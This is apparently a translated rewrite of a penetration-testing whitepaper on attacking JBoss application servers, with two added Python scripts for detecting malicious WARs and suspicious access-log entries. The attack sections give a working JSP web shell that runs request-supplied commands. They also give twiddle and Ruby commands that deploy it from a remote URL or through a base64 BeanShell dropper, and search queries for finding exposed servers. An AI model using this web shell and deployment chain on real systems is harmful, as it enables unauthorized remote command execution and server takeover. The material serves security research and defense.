0x00 Introduction
JBoss AS is a widely used open-source Java application server.
It is part of JBoss Enterprise middleware (JEMS) and is often used in large enterprises.
This software is highly modular and loosely coupled, which makes it complex and an attractive target for attackers.
From the attacker's perspective, this article points out the potential risks of the JBoss application server and uses examples to show how arbitrary code can be executed on it.
0x01 JBoss Overview
The JBoss application server is based on Java Enterprise 1.4 and can be installed on many operating systems, including Linux, FreeBSD, and Windows, as long as a Java Virtual Machine is available on the system.
JBoss Application Service Architecture
Java Management extension (JMX)
Java Management extension (JMX) is a standardized architecture that monitors and manages Java applications. JMX is divided into three layers:
JMX Architecture
Instrumentation Level: defines the information model. In JMX, various management objects exist as management components. When you need to manage them, register them with the MBean server. This layer also defines the notification mechanism and some auxiliary Metadata classes.
Agent Level: mainly defines various services and communication models. The core of this layer is an MBean server. All management components must be registered with it to be managed. The management component registered on the MBean server does not directly communicate with remote applications. They communicate with the connector through Protocol adapters. Protocol adapters and connectors can also be registered with MBean servers as management components to provide corresponding services.
Distributed Service Level: mainly defines the management interfaces and components that operate on the agent level, so that managers can work with the agent. However, the current JMX specification does not provide a concrete specification for this layer.
JMX Invoker
Invokers allow client applications to send JMX requests to the server over any protocol.
The invoker passes these calls to the MBean server and returns the response to the client.
The transport mechanism is transparent, so any protocol such as HTTP, SOAP, or JRMP can be used.
Deployer Architecture
Attackers are particularly interested in the Deployers module of the JBoss application server.
Deployers are used to deploy the different component types.
The component types relevant to this article are:
JAR (Java ARchive): the JAR file format is based on the popular ZIP file format. Unlike ZIP files, JAR files are not only used for compression and distribution, but also for deploying and packaging libraries, components, and plug-ins, and they can be used directly by tools such as compilers and the JVM. A JAR contains special files, such as a manifest and deployment descriptors, that tell tools how to handle that particular JAR.
WAR (Web ARchive): a WAR file is a JAR file that contains the components of a web application, such as JavaServer Pages (JSP), Java classes, and static web pages.
BSH (BeanSHell scripts): BeanShell is a Java scripting language. BeanShell scripts use Java syntax and run on JRE.
The most important JBoss Application Server deployer is MainDeployer. It is the main entry point for component deployment.
The path of the deployment component passed to MainDeployer is in the URL format:
org.jboss.deployment.MainDeployer.deploy(String urlspec)
MainDeployer downloads the object and determines which SubDeployer to forward it to.
Based on the component type, SubDeployer (such as JarDeployer and SarDeployer) accepts the object for installation.
To simplify deployment, the URLDeploymentScanner can be used, which also takes a URL as its parameter:
org.jboss.deployment.scanner.URLDeploymentScanner.addURL(String urlspec)
The added URL is checked periodically for new or changed deployments.
This is how the JBoss application server implements hot deployment: new or changed components are deployed automatically.
0x02 Attacks
WAR File
The simplest way to run your own code on the JBoss application server is to deploy a component, and JBoss can install components over HTTP.
The WAR package must contain a web.xml file in the WEB-INF directory, alongside the actual application code.
This descriptor file declares which URLs the application will serve.
You can use the Java SDK jar command to create a WAR file:
$ jar cvf redteam.war WEB-INF redteam.jsp
Directory structure of redteam.war:
|-- META-INF
|   `-- MANIFEST.MF
|-- WEB-INF
|   `-- web.xml
`-- redteam.jsp
META-INF/MANIFEST.MF is created automatically when the archive is built with jar. It contains information about the JAR, such as the main entry point of the application (the class to be invoked) or which additional classes are required. The file generated here contains nothing special, only basic information:
Manifest-Version: 1.0
Created-By: 1.6.0_10 (Sun Microsystems Inc.)
WEB-INF/web.xml must be created manually. It contains information about the web application, such as its JSP files, a more detailed description, an icon to display, or the name of an error page.
<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
         version="2.4">
  <servlet>
    <servlet-name>RedTeam Shell</servlet-name>
    <jsp-file>/redteam.jsp</jsp-file>
  </servlet>
</web-app>
Content of redteam.jsp:
<%@ page import="java.util.*,java.io.*" %>
<%
if (request.getParameter("cmd") != null) {
    String cmd = request.getParameter("cmd");
    Process p = Runtime.getRuntime().exec(cmd);
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while (disr != null) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
HTTP request:
/redteam.jsp?cmd=ls
All files in the current directory will be listed. After the command is executed, the result will be returned using the following code:
while (disr != null) {
    out.println(disr);
    disr = dis.readLine();
}
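A defender reviewing what lands in a deploy directory wants to know whether a WAR carries a JSP like the one above. The following added example (not part of the whitepaper or of JBoss) scans a WAR archive for JSPs that spawn operating-system processes; the sample WAR it builds is constructed in memory and mirrors the redteam.war layout shown above.

```python
import io
import re
import zipfile

# Source patterns that indicate a JSP hands a command to the operating
# system, as the shell JSP above does (added example, not from the paper).
SUSPICIOUS = (
    re.compile(r"Runtime\.getRuntime\(\)\s*\.exec\s*\("),
    re.compile(r"new\s+ProcessBuilder\s*\("),
)


def scan_war(war_bytes: bytes) -> dict:
    """Return {entry name: [matching patterns]} for every JSP in the WAR
    whose source contains one of the SUSPICIOUS patterns."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".jsp", ".jspx")):
                continue
            source = zf.read(info).decode("utf-8", errors="replace")
            hits = [p.pattern for p in SUSPICIOUS if p.search(source)]
            if hits:
                findings[info.filename] = hits
    return findings


def build_sample_war() -> bytes:
    """Constructed sample WAR with the same layout as the redteam.war tree
    above: manifest, WEB-INF/web.xml, a harmless JSP and one JSP that
    spawns a process (a fixed command, so it is only a detection fixture)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
        zf.writestr("index.jsp", "<%= new java.util.Date() %>")
        zf.writestr("redteam.jsp", '<% Runtime.getRuntime().exec("uname"); %>')
    return buf.getvalue()


if __name__ == "__main__":
    for name, hits in scan_war(build_sample_war()).items():
        print(f"{name}: {', '.join(hits)}")
```

Run it against the contents of a server's deploy directory (or a WAR pulled from an HTTP upload) to get a quick list of pages that deserve manual review.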
JMX Console
The JMX console allows you to directly interact with the JBoss application server through a web browser.
It can easily manage the JBoss server. MBean attributes and methods can be called directly, as long as the parameters do not contain complex parameter types.
JMX console default Interface
This is usually the first target of an attacker.
Server and ServerInfo MBeans
MBean attributes
jboss.system:type=Server
jboss.system:type=ServerInfo
Displays information about the JBoss application server and host system, including the type and version of the Java Virtual Machine and operating system.
MBean attributes
Through the JMX console, MBeans can be read and operated. They expose not only information about the JBoss application server but also about the host, which helps with further attacks.
The shutdown() method of the Server MBean shuts down the JBoss application server, so an unprotected JMX interface also allows denial-of-service attacks.
Installing redteam.war
The MainDeployer MBean and its methods can be found under the jboss.system domain in the JMX console.
The deploy() method can be called with a URL as its parameter. The URL points to the WAR file and must be reachable from the server.
When the Invoke button is clicked, the JBoss application server downloads and installs the WAR file. Afterwards, shell commands can be executed.
deploy() method
Running the ls -l command on the JBoss server.
RMI: Remote Method Invocation
Generally, a password is used to protect the JMX console.
However, this is not the only way to reach the components of the JBoss application server. JBoss components frequently interact with client applications through other interfaces, and Java Remote Method Invocation (RMI) plays an important role here.
With RMI, a local application can access remote objects and call their methods; the communication between client and server is transparent.
The Java Naming and Directory Interface (JNDI) is an API that gives developers a universal, unified interface for looking up and accessing various naming and directory services. Like JDBC, it is an abstraction layer.
The directories and services that can be accessed through JNDI include:
DNS, XNam, Novell Directory Service, LDAP (Lightweight Directory Access Protocol), the CORBA Object Service (COS) naming service, the file system, the Windows XP/2000/NT/Me/9x registry, RMI, DSML v1 & v2, and NIS.
Access MBean through RMI
RMI interfaces are enabled on port 4444 by default, and JNDI interfaces are enabled on ports 1098 and 1099 by default.
A dedicated Java program can communicate with the JBoss application server over RMI. A simpler method is to use twiddle, which ships with the JBoss application server installation.
$ sh jboss-4.2.3.GA/bin/twiddle.sh -h
A JMX client to ’twiddle’ with a remote JBoss server.

usage: twiddle.sh [options] <command> [command_arguments]

options:
    -h, --help                    Show this help message
    --help-commands               Show a list of commands
    -H=<command>                  Show command specific help
    -c=command.properties         Specify the command.properties file to use
    -D<name>[=<value>]            Set a system property
    --                            Stop procession options
    -s, --server=<url>            The JNDI URL of the remote server
    -a, --adapter=<name>          The JNDI name of the RMI adapter to user
    -u, --user=<name>             Specify the username for authentication
    -p, --password=<name>         Specify the password for authentication
    -q, --quiet                   Be somewhat more quiet
With twiddle, the MBeans of the JBoss application server can be called over RMI from the command line. It is started with twiddle.bat on Windows and twiddle.sh on Linux. As in the JMX console, MBean attributes can be read and modified and MBean methods can be invoked.
Display MBean Server Information
$ ./twiddle.sh -s scribus get jboss.system:type=ServerInfo
ActiveThreadCount=50
AvailableProcessors=1
OSArch=amd64
MaxMemory=518979584
HostAddress=127.0.1.1
JavaVersion=1.6.0_06
OSVersion=2.6.24-19-server
JavaVendor=Sun Microsystems Inc.
TotalMemory=129957888
ActiveThreadGroupCount=7
OSName=Linux
FreeMemory=72958384
HostName=scribus
JavaVMVersion=10.0-b22
JavaVMVendor=Sun Microsystems Inc.
JavaVMName=Java HotSpot(TM) 64-Bit Server VM
Install redteam.war
Following twiddle's help, the deploy() method is used to install the WAR file:
$ ./twiddle.sh -s scribus invoke jboss.system:service=MainDeployer deploy http://www.redteam-pentesting.de/redteam.war
Use the following URL to access the shell:
http://scribus:8080/redteam/redteam-shell.jsp
BSHDeployer
The RMI attack above requires the JBoss application server to be able to reach a remote HTTP server.
However, in many configurations the firewall does not allow the JBoss server to open outbound connections.
To install redteam.war on such a JBoss server, the file must first be stored locally on it.
Although JBoss does not allow direct file uploads, the BeanShell deployer can be used to create arbitrary files on the remote server.
BeanShell
BeanShell is a scripting language that runs on the JRE. It supports regular Java syntax, and scripts can be written quickly and executed without a compilation step.
BSHDeployer
In the JBoss server, BSHDeployer can deploy the BeanShell script, which is automatically executed after installation.
The BSHDeployer installation method is as follows:
createScriptDeployment(String bshScript, String scriptName)
BeanShell script
The following BeanShell script can be used to place redteam.war on the JBoss server.
import java.io.FileOutputStream;
import sun.misc.BASE64Decoder;

// Base64 encoded redteam.war
String val = "UEsDBBQACA[...]AAAAA";

BASE64Decoder decoder = new BASE64Decoder();
byte[] byteval = decoder.decodeBuffer(val);
FileOutputStream fs = new FileOutputStream("/tmp/redteam.war");
fs.write(byteval);
fs.close();
The variable val holds the base64-encoded content of the redteam.war file. The script writes redteam.war to the /tmp directory; on Windows, C:\WINDOWS\TEMP\ is used instead.
Install the redteam.war file
With twiddle, the createScriptDeployment() method of BSHDeployer can be called:
$ ./twiddle.sh -s scribus invoke jboss.deployer:service=BSHDeployer createScriptDeployment "`cat redteam.bsh`" redteam.bsh
redteam.bsh contains the BeanShell script above. After a successful call, the JBoss server returns the path of the temporary file created for the BeanShell script:
file:/tmp/redteam.bsh55918.bsh
Once the BeanShell script has been deployed, the file /tmp/redteam.war exists. It can now be deployed from the local file:
$ ./twiddle.sh -s scribus invoke jboss.system:service=MainDeployer deploy file:/tmp/redteam.war
Then you can access the redteam-shell.jsp to execute the command.
Web Console Invoker
JMX console and RMI are the most common methods to control JBoss servers.
In addition to these APIs, JMXInvoker is used in the Web console.
Web Console
The Web Console is similar to the JMX console and can also be accessed through a browser.
Default Web Console interface:
If the JMX console is password-protected, the MBean functions of the Web console are not accessible either; they can only be used after logging in.
Web Console JMX Invoker
In addition to the graphical interface and the JBoss server information, the Web console can monitor MBean attributes in real time.
Access URL:
http://$hostname/web-console/Invoker
This Invoker is in fact a generic JMX Invoker and is not limited to the functions the Web console itself uses.
By default, access is unrestricted, so attackers can use it to send arbitrary JMX commands to the JBoss server.
Install redteam.war
The Invoker of the Web Console can be used to install the redteam.war file.
The webconsole_invoker.rb script calls the JMX Invoker of the Web Console directly. The Java class it uses is org.jboss.console.remote.Util.
The Util.class file is part of the JBoss server JAR console-mgr-classes.jar and provides the following methods:
public static Object invoke(java.net.URL externalURL, RemoteMBeanInvocation mi)
public static Object getAttribute(java.net.URL externalURL, RemoteMBeanAttributeInvocation mi)
With them, the Web Console Invoker can read MBean attributes and invoke methods.
The class is used through the webconsole_invoker.rb script, whose usage is as follows:
$ ./webconsole_invoker.rb -h
Usage: ./webconsole_invoker.rb [options] MBean
    -u, --url URL                    The Invoker URL to use (default: http://localhost:8080/web-console/Invoker)
    -a, --get-attr ATTR              Read an attribute of an MBean
    -i, --invoke METHOD              invoke an MBean method
    -p, --invoke-params PARAMS       MBean method params
    -s, --invoke-sigs SIGS           MBean method signature
    -t, --test                       Test the script with the ServerInfo MBean
    -h, --help                       Show this help

Example usage:
./webconsole_invoker.rb -a OSVersion jboss.system:type=ServerInfo
./webconsole_invoker.rb -i listThreadDump jboss.system:type=ServerInfo
./webconsole_invoker.rb -i listMemoryPools -p true -s boolean jboss.system:type=ServerInfo
Run the following command to install the redteam. war file using BSHDeployer.
$ ./webconsole_invoker.rb -u http://scribus:8080/web-console/Invoker -i createScriptDeployment -s "java.lang.String","java.lang.String" -p "`cat redteam.bsh`",redteam.bsh jboss.deployer:service=BSHDeployer
This creates the redteam.war file locally on the remote server. In the second step, MainDeployer installs the /tmp/redteam.war file.
$ ./webconsole_invoker.rb -u http://scribus:8080/web-console/Invoker -i deploy -s "java.lang.String" -p "file:/tmp/redteam.war" jboss.system:service=MainDeployer
redteam-shell.jsp is accessible again.
JMXInvokerServlet
As mentioned before, the JBoss server allows the MBean server to be accessed over any protocol. For HTTP, JBoss provides the HttpAdaptor.
By default, the HttpAdaptor is not enabled, but the JMX Invoker of the HttpAdaptor can be accessed directly through the following URL.
http://$hostname/invoker/JMXInvokerServlet
This interface accepts HTTP POST requests and forwards them to the MBean server. Therefore, like the Web Console Invoker, JMXInvokerServlet can send arbitrary JMX calls to the JBoss server.
Creating a MarshalledInvocation object
JMXInvokerServlet is not compatible with the Web Console Invoker, so it cannot be called with the webconsole_invoker.rb script.
The MarshalledInvocation object it expects is normally used only for communication inside the JBoss server.
The httpinvoker.rb script is similar to webconsole_invoker.rb, but requires the HttpAdaptor to be activated on the JBoss server.
$ ./httpinvoker.rb -h
Usage: ./httpinvoker.rb [options] MBean
    -j, --jndi URL                   The JNDI URL to use (default: http://localhost:8080/invoker/JNDIFactory)
    -p, --adaptor URL                The Adaptor URL to use (default: jmx/invoker/HttpAdaptor)
    -a, --get-attr ATTR              Read an attribute of an MBean
    -i, --invoke METHOD              invoke an MBean method
        --invoke-params PARAMS       MBean method params
    -s, --invoke-sigs SIGS           MBean method signature
    -t, --test                       Test the script with the ServerInfo MBean
    -h, --help                       Show this help
Install redteam.war
The procedure is the same as with webconsole_invoker.rb.
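All three HTTP interfaces described above (the JMX console, the Web Console Invoker and JMXInvokerServlet) leave traces in the web server access log. The following added example (not part of the whitepaper or of JBoss) classifies such requests by severity; the log lines are constructed in the common log format, and the hosts, addresses and timestamps are made up.

```python
import re
from urllib.parse import unquote

# HTTP management interfaces discussed above (added example, not part of
# the whitepaper or JBoss): JMX console, Web Console Invoker, JMXInvokerServlet.
MGMT_PATHS = ("/jmx-console/", "/web-console/Invoker", "/invoker/JMXInvokerServlet")
# Tokens in a request target that point at a deployment attempt.
DEPLOY_MARKERS = ("MainDeployer", "BSHDeployer", "deploy", "createScriptDeployment")
# Common log format: ip ident user [time] "method target proto" status bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')

def classify(line: str):
    """None for ordinary traffic, else request details plus a severity: info
    (console demanded credentials), medium (management UI reached), high
    (deployment attempt or POST to an invoker)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote(m["target"])
    if not any(target.startswith(p) for p in MGMT_PATHS):
        return None
    status = int(m["status"])
    deploy = any(k in target for k in DEPLOY_MARKERS)
    if status in (401, 403):
        severity = "info"
    elif deploy or (m["method"] == "POST" and "Invoker" in target):
        severity = "high"
    else:
        severity = "medium"
    return {"ip": m["ip"], "method": m["method"], "path": target.split("?", 1)[0],
            "status": status, "deploy": deploy, "severity": severity}

def scan_log(text: str) -> list:
    """Classify every line of an access log and return the flagged entries."""
    return [f for f in map(classify, text.splitlines()) if f]

# Constructed sample log; hosts, addresses and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2008:13:55:36 +0200] "GET /index.html HTTP/1.1" 200 1043
203.0.113.7 - - [10/Oct/2008:13:55:40 +0200] "GET /jmx-console/HtmlAdaptor HTTP/1.1" 200 33012
203.0.113.7 - - [10/Oct/2008:13:56:02 +0200] "GET /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2008:13:56:10 +0200] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 2048
198.51.100.4 - - [10/Oct/2008:14:01:00 +0200] "GET /web-console/Invoker HTTP/1.1" 401 951
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['ip']} {f['method']} {f['path']} -> {f['status']}")
```

A 200 response on any of these paths from an unexpected source means the console is reachable without authentication, which is the condition every attack in this article relies on.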
How to find JBoss servers (search query):
inurl:"jmx-console/HtmlAdaptor"
intitle:"Welcome to JBoss"
From: Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN